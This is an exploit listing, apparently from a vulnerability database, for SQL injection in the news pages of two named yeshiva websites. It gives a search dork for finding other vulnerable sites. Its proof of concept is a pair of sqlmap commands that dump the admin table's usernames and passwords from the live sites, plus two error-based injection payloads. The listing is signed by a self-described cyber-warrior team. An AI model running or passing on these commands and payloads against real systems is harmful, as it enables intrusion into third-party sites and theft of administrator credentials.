Yeshiva Tiferet İsrael SQL Injection

2019.05.17
tr Cerkuday (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title:Yeshiva Tiferet İsrael SQL Injection # Date:16.05.2019 # Dork :intext:" by Yeshiva Tiferet " id= # Exploit Author:Cerkuday & Ergenekon // CyberWarrior TİM AKINCILAR # Tested on:Windows &Kali Linux #Demo: http://www.tiferet.org.il/news_item.php?id=23 http://yeshivatiferet.org/news_item.php?id=32 # Poc: sqlmap -u "http://www.tiferet.org.il/news_item.php?id=23" --random-agent -D tiferet_cms -T admin -C password,username --dump http://www.tiferet.org.il/news_item.php?id=23' AND (SELECT 1535 FROM(SELECT COUNT(*),CONCAT(0x716b6b6b71,(SELECT (ELT(1535=1535,1))),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'yXgx'='yXgx sqlmap -u "http://yeshivatiferet.org/news_item.php?id=32" --random-agent -D tiferet_cms -T admin -C password,username --dump http://yeshivatiferet.org/news_item.php?id=32' OR (SELECT 5602 FROM(SELECT COUNT(*),CONCAT(0x71786a6a71,(SELECT (ELT(5602=5602,1))),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VBqT


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top